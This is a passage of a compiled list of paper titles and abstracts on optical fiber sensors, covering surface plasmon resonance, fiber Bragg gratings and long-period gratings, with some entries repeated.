resonance (SPR), fiber-optic SPR sensors have witnessed a lot of advancements. This paper reports on the past, present, and future scope of fiber-optic SPR sensors in the field of sensing of different chemical, physical, and biochemical parameters. A detailed mechanism of the SPR technique for sensing purposes has been discussed. Different new techniques and models in this area that have been introduced are discussed in quite a detail. We have tried to put the different advancements in the order of their chronological evolution. The content of the review article may be of great importance for the research community who are to take the field of fiber-optic SPR sensors as its research endeavors. --- paper_title: Surface plasmon resonance sensors: review paper_content: Abstract Since the first application of the surface plasmon resonance (SPR) phenomenon for sensing almost two decades ago, this method has made great strides both in terms of instrumentation development and applications. SPR sensor technology has been commercialized and SPR biosensors have become a central tool for characterizing and quantifying biomolecular interactions. This paper attempts to review the major developments in SPR technology. Main application areas are outlined and examples of applications of SPR sensor technology are presented. Future prospects of SPR sensor technology are discussed. --- paper_title: Fiber optic SPR biosensing of DNA hybridization and DNA-protein interactions. paper_content: In this paper we present a fiber optic surface plasmon resonance (SPR) sensor as a reusable, cost-effective and label free biosensor for measuring DNA hybridization and DNA-protein interactions. This is the first paper that combines the concept of a fiber-based SPR system with DNA aptamer bioreceptors. The fibers were sputtered with a 50nm gold layer which was then covered with a protein repulsive self-assembled monolayer of mixed polyethylene glycol (PEG). Streptavidin was attached to the PEG's carboxyl groups to serve as a versatile binding element for biotinylated ssDNA. The ssDNA coated SPR fibers were first evaluated as a nucleic acid biosensor through a DNA-DNA hybridization assay for a random 37-mer ssDNA. This single stranded DNA showed a 15 nucleotides overlap with the receptor ssDNA on the SPR fiber. A linear calibration curve was observed in 0.5-5 microM range. A negative control test did not reveal any significant non-specific binding, and the biosensor was easily regenerated. In a second assay the fiber optic SPR biosensor was functionalized with ssDNA aptamers against human immunoglobulin E. Limits of detection (2nM) and quantification (6nM) in the low nanomolar range were observed. The presented biosensor was not only useful for DNA and protein quantification purposes, but also to reveal the binding kinetics occurring at the sensor surface. The dissociation constant between aptamer and hIgE was equal to 30.9+/-2.9nM. The observed kinetics fully comply with most data from the literature and were also confirmed by own control measurements. --- paper_title: Fibre-optic evanescent field absorption sensor based on a U-shaped probe paper_content: A fibre-optic evanescent field absorption sensor based on a U-shaped sensing probe is described. The influences of fibre core diameter, bending radius of the probe and the refractive index of the fluid on the sensitivity of the sensor are evaluated experimentally. The results are compared with the theoretical results obtained using geometrical optics and based on two-dimensional treatment. A good qualitative agreement is found between them. --- paper_title: Surface Plasmon Resonance-Based Fiber Optic Sensors: Principle, Probe Designs, and Some Applications paper_content: Surface plasmon resonance technique in collaboration with optical fiber technology has brought tremendous advancements in sensing of various physical, chemical, and biochemical parameters. In this review article, we present the principle of SPR technique for sensing and various designs of the fiber optic SPR probe reported for the enhancement of the sensitivity of the sensor. In addition, we present few examples of the surface plasmon resonance- (SPR-) based fiber optic sensors. The present review may provide researchers valuable information regarding fiber optic SPR sensors and encourage them to take this area for further research and development. --- paper_title: Bending effects in optical fibers paper_content: Mode coupling at bends in optical fibers supporting one or only a few guided modes is analyzed by considering the local normal modes for the corresponding straight waveguide. Matrix elements giving the strength of coupling between guided modes at a corner bend, and for coupling between guided modes and radiation modes, are calculated as a function of guiding strength for this "geometrical" effect. The correction to these matrix elements due to the longitudinal strain in a bent fiber is also determined. The increase in propagation constant for the fundamental mode of a fiber wrapped in a coil of constant radius is calculated from information on the coupling strengths and mode propagation constants. The phase shift and attenuation of the fundamental mode caused by a spatially periodic microbending of the fiber axis are also considered. Finally, potential applications of these effects in fiber-optic devices such as mode converters, phase shifters, switches, and sensors are discussed. --- paper_title: A fiber-optic chemical sensor based on surface plasmon resonance paper_content: Abstract A fiber-optic chemical sensor is presented which utilizes surface plasmon resonance excitation. The sensing element of the fiber has been fabricated by removing a section of the fiber cladding and symmetrically depositing a thin layer of highly reflecting metal onto the fiber core. A white-light source is used to introduce a range of wavelengths into the fiber optic. Changes in the sensed parameters (e.g., bulk refractive index, film thinkness and film refractive index) are determined by measuring the transmitted spectral-intensity distribution. Experimental results of the sensitivity and the dynamic range in the measurement of the refractive indices of aqueous solutions are in agreement with the theoretical model of the sensor. --- paper_title: Fiber-Optic Sensors Based on Surface Plasmon Resonance: A Comprehensive Review paper_content: Since the introduction of optical fiber technology in the field of sensor based on the technique of surface plasmon resonance (SPR), fiber-optic SPR sensors have witnessed a lot of advancements. This paper reports on the past, present, and future scope of fiber-optic SPR sensors in the field of sensing of different chemical, physical, and biochemical parameters. A detailed mechanism of the SPR technique for sensing purposes has been discussed. Different new techniques and models in this area that have been introduced are discussed in quite a detail. We have tried to put the different advancements in the order of their chronological evolution. The content of the review article may be of great importance for the research community who are to take the field of fiber-optic SPR sensors as its research endeavors. --- paper_title: Design and characteristics of refractive index sensor based on thinned and microstructure fiber Bragg grating. paper_content: A refractive index sensor based on the thinned and microstructure fiber Bragg grating (ThMs-FBG) was proposed and realized as a chemical sensing. The numerical simulation for the reflectance spectrum of the ThMs-FBG was calculated and the phase shift down-peak could be observed from the reflectance spectrum. Many factors influencing the reflectance spectrum were considered in detail for simulation, including the etched depth, length, and position. The sandwich-solution etching method was utilized to realize the microstructure of the ThMs-FBG, and the photographs of the microstructure were obtained. Experimental results demonstrated that the reflectance spectrum, phase shift down-peak wavelength, and reflected optical intensity of the ThMs-FBG all depended on the surrounding refractive index. However, only the down-peak wavelength of the ThMs-FBG changed with the surrounding temperature. Under the condition that the length and cladding diameter of the ThMs-FBG microstructure were 800 and 14 mum, respectively, and the position of the microstructure of the ThMs-FBG is in the middle of grating region, the refractive index sensitivity of the ThMs-FBG was 0.79 nm/refractive index unit with the wide range of 1.33-1.457 and a high resolution of 1.2 x 10(-3). The temperature sensitivity was 0.0103 nm/ degrees C, which was approximately equal to that of common FBG. --- paper_title: Point-by-point written fiber-Bragg gratings and their application in complex grating designs paper_content: The point-by-point technique of fabricating fibre-Bragg gratings using an ultrafast laser enables complete control of the position of each index modification that comprises the grating. By tailoring the local phase, amplitude and spacing of the grating’s refractive index modulations it is possible to create gratings with complex transmission and reflection spectra. We report a series of grating structures that were realized by exploiting these flexibilities. Such structures include gratings with controlled bandwidth, and amplitude- and phase-modulated sampled (or superstructured) gratings. A model based on coupled-mode theory provides important insights into the manufacture of such gratings. Our approach offers a quick and easy method of producing complex, non-uniform grating structures in both fibres and other mono-mode waveguiding structures. --- paper_title: Fiber grating spectra paper_content: In this paper, we describe the spectral characteristics that can be achieved in fiber reflection (Bragg) and transmission gratings. Both principles for understanding and tools for designing fiber gratings are emphasized. Examples are given to illustrate the wide variety of optical properties that are possible in fiber gratings. The types of gratings considered include uniform, apodized, chirped, discrete phase-shifted, and superstructure gratings; short-period and long-period gratings; symmetric and tilted gratings; and cladding-mode and radiation-mode coupling gratings. --- paper_title: Hydrogen sensor based on side-polished fiber Bragg gratings coated with thin palladium film paper_content: A new type of hydrogen sensor based on a side-polished fiber Bragg grating (FBG) coated with thin palladium film was demonstrated experimentally. The used FBG with the reflectivity of 90% is fabricated in a hydrogen-loaded single-mode fiber (SMF-28) by using the phase mask writing technique of a KrF excimer laser. The experimental results show that proposed sensor can be applied for hydrogen concentration measurements. --- paper_title: Formation of Bragg gratings in optical fibers by a transverse holographic method. paper_content: Bragg gratings have been produced in germanosilicate optical fibers by exposing the core, through the side of the cladding, to a coherent UV two-beam interference pattern with a wavelength selected to lie in the oxygen-vacancy defect band of germania, near 244 nm. Fractional index perturbations of approximately 3 x 10(-5) have been written in a 4.4-mm length of the core with a 5-min exposure. The Bragg filters formed by this new technique had reflectivities of 50-55% and spectral widths, at half-maximum, of 42 GHz. --- paper_title: Thinned fiber Bragg gratings as high sensitivity refractive index sensor paper_content: In this work, the numerical and experimental analysis on the use of thinned fiber Bragg gratings as refractive index sensors have been carried out. Wet chemical etching in a buffered hydrofluoric acid solution was used for sensor fabrication. Experimental characterization for an almost full etched cladding sensor is presented demonstrating good agreement with numerical results and resolutions of /spl ap/10/sup -5/ and /spl ap/10/sup -4/ for outer refractive index around 1.45 and 1.333, respectively. --- paper_title: Theoretical and experimental study on etched fiber Bragg grating cladding mode resonances for ambient refractive index sensing paper_content: The theoretical model of etched fiber Bragg grating (FBG) backward cladding-mode resonances for ambient refractive index sensing is presented. The dependent behaviors of the mode resonances have been analyzed in the etching process and the ambient refractive index changed. The analysis is based on the classical coupling-mode theory while considering interactions among multiple modes and developed on a three-layer step-index fiber geometry. Experimental data match the theoretical model wonderfully. This model not only describes the relationship between the FBG backward cladding-mode resonances and the ambient index but also is valuable for the design of a flexible highly sensitive ambient index sensor. --- paper_title: Etched fiber Bragg grating for refractive index distribution measurement paper_content: Abstract We present a refractive index (RI) distribution sensor based on an etched fiber Bragg grating (FBG). The FBG is etched by hydrofluoric acid solution until the residual diameter of its core is about 5.73 μm, and then it is installed in a micro-tube where the RI of the liquid medium decreases linearly along its axis. The reflection spectrum of the etched FBG changes from a single resonant peak into many micro-resonant peaks under the inhomogeneous liquid medium. The difference of the wavelengths between the maximum micro-resonant peak and the minimum one changes linearly with the RI gradient, and the average change of the wavelengths of them changes linearly with the average change of the RI as well. Experimental results show that the sensitivity of RI gradient and the average sensitivity of RI for this etched FBG sensor is about 336.2 nm mm/RIU and 49.44 nm/RIU, respectively, when the surrounding RI ranges from 1.330 to 1.3586. Associated with the sensitivity of the RI gradient and the average sensitivity of the RI, the linear RI distribution of inhomogeneous liquid medium surrounding the etched FBG can be obtained. --- paper_title: Optical low-coherence reflectometry (OLCR) characterization of efficient Bragg gratings in optical fiber paper_content: Keywords: [OFD] Note: Ouellette, FConference on Photosensitivity and Self-Organization in Optical Fibers and WaveguidesAUG 17-18, 1993QUEBEC, CANADA0-8194-1303-8 Reference LOA-ARTICLE-1993-003 Record created on 2009-01-20, modified on 2017-05-10 --- paper_title: Demonstration of etched cladding fiber Bragg grating-based sensors with hydrogel coating paper_content: A novel hydrogel-coated single-mode fiber Bragg grating (FBG) sensor is investigated. The sensor uses a swellable polymer material, hydrogel, as the active sensing component. The sensing mechanism is based on the stress that is induced in the chemically sensitive swellable hydrogel coating. The stress shifts the Bragg wavelength of the FBG. By reducing the cladding diameter of FBG through etching with hydrofluoric acid, the tension tuning force of FBG can be lowered. Therefore, the stress induced in hydrogel can shift the wavelength of FBG more and the sensitivity of the sensor is improved. When the grating fiber is etched 37.5 μm in diameter, the sensitivity of sensor is approximately 10-fold larger than that without fiber etching. --- paper_title: Visible wavelength fiber Bragg grating arrays for high speed biomedical spectral sensing paper_content: Spectral data for each pixel in a confocal spatial scan are acquired by mapping spectral slices into the time domain with an array of visible fiber Bragg gratings. Multispectral images of biomedical tissue can be generated in real time. --- paper_title: D-shaped fiber grating refractive index sensor induced by an ultrashort pulse laser paper_content: The fabrication of fiber Bragg gratings was here demonstrated using ultrashort pulse laser point-by-point inscription. This is a very convenient means of creating fiber Bragg gratings with different grating periods and works by changing the translation speed of the fiber. The laser energy was first optimized in order to improve the spectral properties of the fiber gratings. Then, fiber Bragg gratings were formed into D-shaped fibers for use as refractive index sensors. A nonlinear relationship was observed between the Bragg wavelength and liquid refractive index, and a sensitivity of ∼30 nm/RIU was observed at 1.450. This shows that D-shaped fiber Bragg gratings might be used to develop promising biochemical sensors. --- paper_title: A Temperature-Insensitive Cladding-Etched Fiber Bragg Grating Using a Liquid Mixture with a Negative Thermo-Optic Coefficient paper_content: To compensate for the temperature dependency of a standard FBG, a cladding-etched FBG immersed with a liquid mixture having a negative thermo-optic coefficient is presented, and its characteristics are investigated. The Bragg wavelength of the cladding-etched FBG is shifted counter to the direction of the Bragg wavelength shift of a conventional FBG according to the mixing ratio of glycerin to water; thus, the temperature-dependent Bragg wavelength shift was almost compensated by using a liquid mixture of water (50%) and glycerin (50%) having the negative thermo-optic coefficient of −5 × 10−4 °C−1. --- paper_title: Point-by-point fabrication of micro-Bragg gratings in photosensitive fibre using single excimer pulse refractive index modification techniques paper_content: Optical fibre Bragg reflectors have been fabricated using a single pulse of high power 249 nm excimer laser light to photoinduce point-by-point each individual index element forming the grating. Bragg reflectors with a length of 360 μm and reflectivity of 70% have been made. --- paper_title: Fiber Bragg Gratings: Fundamentals and Applications in Telecommunications and Sensing paper_content: Photosensitivity in optical fibres properties of Fibre Bragg gratings inscribing Bragg gratings in optical fibres Fibre Bragg grating theory applications of Bragg gratings in communications Fibre Bragg grating sensors impact of Fibre Bragg gratings. --- paper_title: Bragg gratings fabricated in monomode photosensitive optical fiber by UV exposure through a phase mask paper_content: A photolithographic method is described for fabricating refractive index Bragg gratings in photosensitive optical fiber by using a special phase mask grating made of silica glass. A KrF excimer laser beam (249 nm) at normal incidence is modulated spatially by the phase mask grating. The diffracted light, which forms a periodic, high‐contrast intensity pattern with half the phase mask grating pitch, photoimprints a refractive index modulation into the core of photosensitive fiber placed behind, in proximity, and parallel, to the mask; the phase mask grating striations are oriented normal to the fiber axis. This method of fabricating in‐fiber Bragg gratings is flexible, simple to use, results in reduced mechanical sensitivity of the grating writing apparatus and is functional even with low spatial and temporal coherence laser sources. --- paper_title: A fibre Bragg grating refractometer paper_content: An opto-chemical in-fibre Bragg grating (FBG) sensor for refractive index measurement in liquids has been developed using fibre side-polishing technology. At a polished site where the fibre cladding has partly been removed, a FBG is exposed to a liquid analyte via evanescent field interaction of the guided fibre mode. The Bragg wavelength of the FBG is obtained in terms of its dependence on the refractive index of the analyte. Modal and wavelength dependences have been investigated both theoretically and experimentally in order to optimize the structure of the sensor. Using working wavelengths far above the cut-off wavelength results in an enhancement of the sensitivity of the sensor. Measurements with different mode configurations lead to the separation of cross sensitivities. Besides this, a second FBG located in the unpolished part can be used to compensate for temperature effects. Application examples for monitoring fuels of varying quality as well as salt concentrations under deep borehole conditions are presented. --- paper_title: Demonstration of an etched cladding fiber Bragg grating filter with reduced tuning force requirement paper_content: A novel tunable fiber Bragg grating (FBG) filter with a chemically etched cladding has been demonstrated. By reducing the cladding diameter of a FBG through etching with HF, the tension tuning force can be lowered by over an order of magnitude. Wavelength tuning up to a failure point of 21.2 nm has been demonstrated along with repeated cycling over a 9 nm tuning range. Observations of increased coupling to resonant cladding modes in the etched FBG's are also noted. --- paper_title: Fiber Bragg grating technology fundamentals and overview paper_content: The historical beginnings of photosensitivity and fiber Bragg grating (FBG) technology are recounted. The basic techniques for fiber grating fabrication, their characteristics, and the fundamental properties of fiber gratings are described. The many applications of fiber grating technology are tabulated, and some selected applications are briefly described. --- paper_title: Side-polished fiber Bragg grating refractive index sensor with TbFeCo magnetoptic thin film paper_content: Fiber Bragg grating (FBG) is side-polished to enable interaction with sensitive materials around FBG fiber core. Using TbFeCo magneto-optic thin film deposited onto FBG fiber core as transducer, a FBG refractive index senor for magnetic field/current characterization is first proposed and demonstrated in this paper. Magnetic field sensing experiments show 19 pm of wavelength shift at a magnetic field intensity of 50 mT, the average linearity of magnetic field response is 0.9877. --- paper_title: Recent research progress of optical fiber sensors based on D-shaped structure paper_content: Abstract The review summarizes recent studies on D-shaped optical fibers and their recent applications in optical sensors. The configurations and working principles of D-shaped optical fibers are introduced. For each optical fiber sensor, the structure principles and measuring methods are all discussed in detail, with their optimal characteristics and performances being compared. Results from various studies show that it is possible to realize a high-sensitivity optical fiber sensor with a simple structure, good mechanical properties, and strong anti-interference ability. This may be due to the excellent structural design of the D-shaped optical fiber. Finally, key issues and new challenges on the D-shaped optical fiber are discussed. --- paper_title: Fiber Bragg Gratings in the Visible Spectral Range With Ultraviolet Femtosecond Laser Inscription paper_content: In this letter, we investigate the inscription of fiber Bragg gratings in the visible spectral range using deep ultraviolet femtosecond laser exposure and two-beam interferometry. The properties of first-order reflection gratings and third-order gratings for use in the visible wavelength range are compared. Stronger gratings have been achieved for first-order reflecting Bragg gratings compared with third-order gratings. We demonstrate a fiber Bragg grating with a grating period of 226 nm and a filtering efficiency of more than 30 dB. --- paper_title: Side-polished fiber Bragg grating hydrogen sensor with WO 3 -Pd composite film as sensing materials paper_content: WO3-Pd composite films were deposited on the side-face of side-polished fiber Bragg grating as sensing elements by magnetron sputtering process. XRD result indicates that the WO3-Pd composite films are mainly amorphous. Compared to standard FBG coated with same hydrogen sensitive film, side-polished FBG significantly increase the sensor’s sensitivity. When hydrogen concentrations are 4% and 8% in volume percentage, maximum wavelength shifts of side-polished FBG are 25 and 55 pm respectively. The experimental results show the sensor’s hydrogen response is reversible, and side-polished FBG hydrogen sensor has great potential in hydrogen’s measurement. --- paper_title: Wide Range Refractive Index Measurement Using a Multi-Angle Tilted Fiber Bragg Grating paper_content: The conventional single-angle tilted fiber Bragg grating (TFBG) can only excite a certain range of cladding modes, limiting it for refractive index (RI) measurement in a wide range. In this letter, we fabricate and demonstrate a multi-angle TFBG, in which five individual TFBGs with tilt angles ranging from 5° to 25° are sequentially inscribed along the core of a single mode fiber within a length of 20 mm. The multi-angle TFBG excites a continuous spectral comb of narrowband-cladding modes over a much wider wavelength range (>170 nm) than a single-angle TFBG, making it suitable for dynamic RI measurement over a wide range (1.15–1.45). We have experimentally measured aqueous solutions with RI ranging from 1.30 to 1.45 using the uncoated (by monitoring the cut-off mode) and gold-coated (by monitoring the surface Plasmon resonance) multi-angle TFBGs, and both methods show linear responses, with RI sensitivities about 500 nm/RIU. --- paper_title: Demodulation technique for weakly tilted fiber Bragg grating refractometer paper_content: In this letter, a demodulation technique is presented in order to measure the surrounding refractive index in the range 1-1.45 by means of a weakly tilted fiber Bragg grating. This technique is based on the global monitoring of the cladding modes in the transmitted spectrum and on the computation of two statistical parameters. We report a resolution of 210/sup -4/ in terms of the refractive index as well as a temperature-insensitive behavior. --- paper_title: Tilted fiber phase gratings paper_content: A detailed theoretical treatment is presented of bound-mode to bound-mode Bragg reflection and bound-mode to radiation-mode coupling loss in a tilted optical-fiber phase grating. Numerical predictions of the effects of grating tilt on the spectral characteristics of such a grating are calculated. These predictions are compared with experimentally measured spectra of strong gratings written by ultraviolet irradiation of deuterium-sensitized fiber with grating tilt angles ranging from 0° to 15°. Good agreement is obtained between the theoretical predictions and the experimental results. --- paper_title: Optical fiber refractometer using narrowband cladding-mode resonance shifts. paper_content: Short-period fiber Bragg gratings with weakly tilted grating planes generate multiple strong resonances in transmission. Our experimental results show that the wavelength separation between selected resonances allows the measurement of the refractive index of the medium surrounding the fiber for values between 1.25 and 1.44 with an accuracy approaching 1x10(-4). The sensor element is 10 mm long and made from standard single-mode telecommunication grade optical fiber by ultraviolet light irradiation through a phase mask. --- paper_title: Ultrasensitive plasmonic sensing in air using optical fibre spectral combs paper_content: Fibre sensors are key to many minimally-invasive detection techniques but, owing to an index mismatch, they are often limited to aqueous environments. Here, Caucheteur et al. develop a high-resolution fibre gas sensor with a tilted in-fibre grating that allows coupling to higher-order plasmon modes. --- paper_title: Wide Range Refractive Index Measurement Using a Multi-Angle Tilted Fiber Bragg Grating paper_content: The conventional single-angle tilted fiber Bragg grating (TFBG) can only excite a certain range of cladding modes, limiting it for refractive index (RI) measurement in a wide range. In this letter, we fabricate and demonstrate a multi-angle TFBG, in which five individual TFBGs with tilt angles ranging from 5° to 25° are sequentially inscribed along the core of a single mode fiber within a length of 20 mm. The multi-angle TFBG excites a continuous spectral comb of narrowband-cladding modes over a much wider wavelength range (>170 nm) than a single-angle TFBG, making it suitable for dynamic RI measurement over a wide range (1.15–1.45). We have experimentally measured aqueous solutions with RI ranging from 1.30 to 1.45 using the uncoated (by monitoring the cut-off mode) and gold-coated (by monitoring the surface Plasmon resonance) multi-angle TFBGs, and both methods show linear responses, with RI sensitivities about 500 nm/RIU. --- paper_title: In-fibre directional transverse loading sensor based on excessively tilted fibre Bragg gratings paper_content: We report a distinctive polarization mode coupling behaviour of tilted fibre Bragg gratings (TFBGs) with a tilted angle exceeding 45°. The ex-45° TFBGs exhibit pronounced polarization mode splitting resulted from the birefringence induced by the grating structure asymmetry. We have fabricated TFBGs with a tilted structure at 81° and studied their properties under transverse load applied to their equivalent fast and slow axes. The results show that the light coupling to the orthogonally polarized modes of the 81°-TFBGs changes only when the load is applied to their slow axis, giving a prominent directional loading response. For the view of real applications, we further investigated the possibility of interrogating such a TFBG-based load sensor using low-cost and compact-size single wavelength source and power detector. The experimental results clearly show that the 81°-TFBGs plus the proposed power-measurement interrogation scheme may be developed to an optical fibre vector sensor system capable of not just measuring the magnitude but also recognizing the direction of the applied transverse load. Using such an 81°-TFBG based load sensor, a load change as small as 1.6 × 10-2 g may be detected by employing a standard photodiode detector. --- paper_title: Ultrasensitive plasmonic sensing in air using optical fibre spectral combs paper_content: Fibre sensors are key to many minimally-invasive detection techniques but, owing to an index mismatch, they are often limited to aqueous environments. Here, Caucheteur et al. develop a high-resolution fibre gas sensor with a tilted in-fibre grating that allows coupling to higher-order plasmon modes. --- paper_title: Graphene-induced unique polarization tuning properties of excessively tilted fiber grating paper_content: By exploiting the polarization-sensitive coupling effect of graphene with the optical mode, we investigate the polarization modulation properties of a hybrid waveguide of graphene-integrated excessively tilted fiber grating (Ex-TFG). The theoretical analysis and experimental results demonstrate that the real and imaginary parts of complex refractive index of few-layer graphene exhibit different effects on transverse electric (TE) and transverse magnetic (TM) cladding modes of the Ex-TFG, enabling stronger absorption in the TE mode and more wavelength shift in the TM mode. Furthermore, the surrounding refractive index can modulate the complex optical constant of graphene and then the polarization properties of the hybrid waveguide, such as resonant wavelength and peak intensity. Therefore, the unique polarization tuning property induced by the integration of the graphene layer with Ex-TFG may endow potential applications in all-in-one fiber modulators, fiber lasers, and biochemical sensors. --- paper_title: Optic sensors of high refractive-index responsivity and low thermal cross sensitivity that use fiber Bragg gratings of >80° tilted structures paper_content: For the first time to the authors' knowledge, fiber Bragg gratings (FBGs) with >80 degrees tilted structures have been fabricated and characterized. Their performance in sensing temperature, strain, and the surrounding medium's refractive index was investigated. In comparison with normal FBGs and long-period gratings (LPGs), >80 degrees tilted FBGs exhibit significantly higher refractive-index responsivity and lower thermal cross sensitivity. When the grating sensor was used to detect changes in refractive index, a responsivity as high as 340 nm/refractive-index unit near an index of 1.33 was demonstrated, which is three times higher than that of conventional LPGs. --- paper_title: Wide Range Refractive Index Measurement Using a Multi-Angle Tilted Fiber Bragg Grating paper_content: The conventional single-angle tilted fiber Bragg grating (TFBG) can only excite a certain range of cladding modes, limiting it for refractive index (RI) measurement in a wide range. In this letter, we fabricate and demonstrate a multi-angle TFBG, in which five individual TFBGs with tilt angles ranging from 5° to 25° are sequentially inscribed along the core of a single mode fiber within a length of 20 mm. The multi-angle TFBG excites a continuous spectral comb of narrowband-cladding modes over a much wider wavelength range (>170 nm) than a single-angle TFBG, making it suitable for dynamic RI measurement over a wide range (1.15–1.45). We have experimentally measured aqueous solutions with RI ranging from 1.30 to 1.45 using the uncoated (by monitoring the cut-off mode) and gold-coated (by monitoring the surface Plasmon resonance) multi-angle TFBGs, and both methods show linear responses, with RI sensitivities about 500 nm/RIU. --- paper_title: Negative axial strain sensitivity in gold-coated eccentric fiber Bragg gratings paper_content: New dual temperature and strain sensor has been designed using eccentric second-order fiber Bragg gratings produced in standard single-mode optical fiber by point-by-point direct writing technique with tight focusing of 800 nm femtosecond laser pulses. With thin gold coating at the grating location, we experimentally show that such gratings exhibit a transmitted amplitude spectrum composed by the Bragg and cladding modes resonances that extend in a wide spectral range exceeding one octave. An overlapping of the first order and second order spectrum is then observed. High-order cladding modes belonging to the first order Bragg resonance coupling are close to the second order Bragg resonance, they show a negative axial strain sensitivity (-0.55 pm/με) compared to the Bragg resonance (1.20 pm/με) and the same temperature sensitivity (10.6 pm/°C). With this well conditioned system, temperature and strain can be determined independently with high sensitivity, in a wavelength range limited to a few nanometers. --- paper_title: Cladding mode coupling in highly localized fiber Bragg gratings: modal properties and transmission spectra paper_content: The spectral characteristics of a fiber Bragg grating (FBG) with a transversely inhomogeneous refractive index profile, differs con- siderably from that of a transversely uniform one. Transmission spectra of inhomogeneous and asymmetric FBGs that have been inscribed with focused ultrashort pulses with the so-called point-by-point technique are investigated. The cladding mode resonances of such FBGs can span a full octave in the spectrum and are very pronounced (deeper than 20dB). Using a coupled-mode approach, we compute the strength of resonant coupling and find that coupling into cladding modes of higher azimuthal order is very sensitive to the position of the modification in the core. Exploiting these properties allows precise control of such reflections and may lead to many new sensing applications. --- paper_title: Surface plasmon resonance in eccentric femtosecond-laser-induced fiber Bragg gratings paper_content: Highly localized refractive index modulations are photo-written in the core of pure silica fiber using point-by-point focused UV femtosecond pulses. These specific gratings exhibit a comb-like transmitted amplitude spectrum, with polarization-dependent narrowband cladding mode resonances. In this work, eccentric gratings are surrounded by a gold sheath, allowing the excitation of surface plasmon polaritons (SPP) for radially-polarized light modes. The spectral response is studied as a function of the surrounding refractive index and a maximum sensitivity of 50 nm/RIU (refractive index unit) is reported for a well-defined cladding-mode resonance among the spectral comb. This novel kind of plasmonic fiber grating sensor offers rapidity of production, design flexibility, and high temperature stability. --- paper_title: Cladding mode coupling in highly localized fiber Bragg gratings II: complete vectorial analysis paper_content: Highly localized fiber Bragg gratings can be inscribed point-by-point with focused ultrashort pulses. The transverse localization of the resonant grating causes strong coupling to cladding modes of high azimuthal and radial order. In this paper, we show how the reflected cladding modes can be fully analyzed, taking their vectorial nature, orientation and degeneracies into account. The observed modes’ polarization and intensity distributions are directly tied to the dispersive properties and show abrupt transitions in nature, strongly correlated with changes in the coupling strengths. --- paper_title: Off-axis ultraviolet-written fiber Bragg gratings for directional bending measurements. paper_content: Off-axis fiber Bragg gratings are inscribed by ultraviolet irradiation limited to expose only a portion of the fiber core cross section. The coupling to cladding modes is significantly increased, and the amplitude of the cladding mode resonances becomes sensitive to bending in magnitude and direction. Sensitivities ranging from +1.17 dB/m(-1) to -1.25 dB/m(-1) were obtained for bending in different directions relative to the offset direction of the grating, for curvatures from 0 to 1.1 m(-1), a range ideal for the shape sensing of large structures. The bending sensor response is also shown to be independent of temperature and the surrounding refractive index. --- paper_title: Ultrasensitive plasmonic sensing in air using optical fibre spectral combs paper_content: Fibre sensors are key to many minimally-invasive detection techniques but, owing to an index mismatch, they are often limited to aqueous environments. Here, Caucheteur et al. develop a high-resolution fibre gas sensor with a tilted in-fibre grating that allows coupling to higher-order plasmon modes. --- paper_title: Long-period fiber gratings as band-rejection filters paper_content: We present a new class of long-period fiber gratings that can be used as in-fiber, low-loss, band-rejection filters. Photoinduced periodic structures written in the core of standard communication-grade fibers couple light from the fundamental guided mode to forward propagating cladding modes and act as spectrally selective loss elements with insertion losses act as backreflections <-80 dB, polarization-mode-dispersions <0.01 ps and polarization-dependent-losses <0.02 dB. --- paper_title: Characterization of Long-period Grating Refractive Index Sensors and Their Applications paper_content: The influence of grating length and bend radius of long-period gratings (LPGs) on refractive index sensing was examined. Sensitivity to refractive indexes smaller than that of silica could be enhanced by bending LPGs. Bent LPGs lost sensitivity to refractive indexes higher than that of silica, whereas a 20-mm-long LPG arranged in a straight line had considerable sensitivity. These experimental results demonstrated that the sensitivity characteristics of LPGs to refractive index could be controlled by grating length and bend radius. --- paper_title: Long period fibre gratings for structural bend sensing paper_content: The authors examine the changes in wavelength and attenuation of long period fibre gratings subjected to bends with curvatures from 0 to 4.4 m/sup -1/. The wavelength change with curvature is nonlinear, with a projected minimum detectable curvature change of 2/spl times/10/sup -3/ m/sup -1/. The magnitude of the bend-induced wavelength shift depends on the rotation of the cylindrical fibre relative to the bending plane. --- paper_title: Measurements of refractive index sensitivity using long-period grating refractometer paper_content: Abstract We report the development and demonstration of a long-period grating refractometer. The principle of operation is based on the using of a long-period grating that is structurally induced by a CO 2 laser, and where the resonance wavelengths are shifted as the refractive index of medium surrounding the cladding of the long-period grating. The different concentrations for three types of solutions (ethylene glycol, salt, and sugar) were experimentally measured, and results show that, as a refractometer, this fiber-based device not only can differentiate chemicals based on their refractive index, but it can also become a concentration indicator of a particular chemical solution, and applied in the oil and petroleum industry. --- paper_title: Optical Fiber-Excited Surface Plasmon Resonance Spectroscopy of Single and Ensemble Gold Nanorods paper_content: Gold nanorods are deposited on the core surface of an etched optical fiber, and their surface plasmon resonance is excited by the evanescent wave from the optical fiber. The excitation of the surface plasmon produces strong light scattering from individual nanorods, allowing for single-particle scattering-based imaging and spectroscopy. We systematically characterize the dependence of the scattering spectra of individual nanorods on the refractive index of the surrounding medium. As the refractive index is increased, the scattering spectra red shift steadily. The refractive index sensitivity and sensing figure of merit, which is the index sensitivity divided by the scattering peak line width, are found to reach 200 nm/RIU (RIU = refractive index unit) and 3.8, respectively. We further investigate the ensemble response of the plasmon resonance of Au nanorods to varying dielectric environments by measuring the intensity and spectrum of the light transmitted through the fiber. The ensemble index sensitivity ... --- paper_title: Tuning the Resonance of the Excessively Tilted LPFG-Assisted Surface Plasmon Polaritons: Optimum Design Rules for Ultrasensitive Refractometric Sensor paper_content: An excessively tilted LPFG-assisted surface plasmon polaritons sensor (Ex-TLPFG assisted SPP sensor) with ultrahigh sensitivity is proposed and numerically investigated using the finite-element-method-based full-vector complex coupled mode theory. We show that the SPP mode is transited (or excited) gradually from both the p-polarized TM $_{0,j}$ and EH $_{v,j}$ ( $v\geq 1$ ) modes, and hence, the proposed SPP sensor can be tuned to achieve strong resonance of either the degenerate TM $_{0,j}$ and EH $_{2,j}$ modes or EH $_{1,j}$ mode to optimize the sensitivity for analyte refractive index sensing. The results confirm that a transition point corresponding to the phase matching curve of the SPP mode is obtained, which can be used to predict the optimized grating period. By this approach, ultrasensitive SPP refractometric sensor can be obtained and the sensitivity can be further improved through a simple method: reducing the fiber cladding combined with an optimized grating period. We demonstrate that a giant sensitivity as high as $10100\,\text{nm}/\text{RIU}$ is achieved for the degenerate TM $_{0,32}$ and EH $_{2,32}$ modes (or $7400\,\text{nm/RIU}$ for the EH $_{1,32}$ mode). These appealing characteristics make the proposed Ex-TLPFG-assisted SPP sensor ideal for biochemical analyte sensing applications. --- paper_title: Lab on Fiber Technology for biological sensing applications paper_content: This review presents an overview of “Lab on 